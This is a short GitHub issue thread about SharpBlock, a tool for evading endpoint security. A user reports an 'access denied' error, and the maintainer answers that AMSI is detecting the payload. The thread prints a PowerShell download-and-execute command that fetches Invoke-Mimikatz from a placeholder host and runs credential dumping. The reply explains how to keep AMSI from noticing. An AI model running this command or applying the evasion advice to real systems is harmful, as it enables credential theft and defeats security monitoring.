### ISSUE TITLE
Access Denied running with -a 

### ISSUE THREAD

**Issue by aleemladha** [CCob/SharpBlock#3]
Hi when i run the program with -a i get access denied, it works find if i run the programs separately.

SharpBlock.exe -e c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command coffee;" 

![image](https://user-images.githubusercontent.com/26311391/87410377-e7233300-c5ce-11ea-8676-fe9e65a523b5.png)

Running the powershell then calling the mimikatz works fine.

![image](https://user-images.githubusercontent.com/26311391/87410454-01f5a780-c5cf-11ea-80dd-2763f6f4cb4c.png)

![image](https://user-images.githubusercontent.com/26311391/87410495-0f129680-c5cf-11ea-90cc-ebe951a0724c.png)

**Comment by CCob** [comment]
Your initial powershell is not running through SharpBlock, so AMSI is picking up on the Invoke-Mimikatz or the URL that you are passing on the command line.
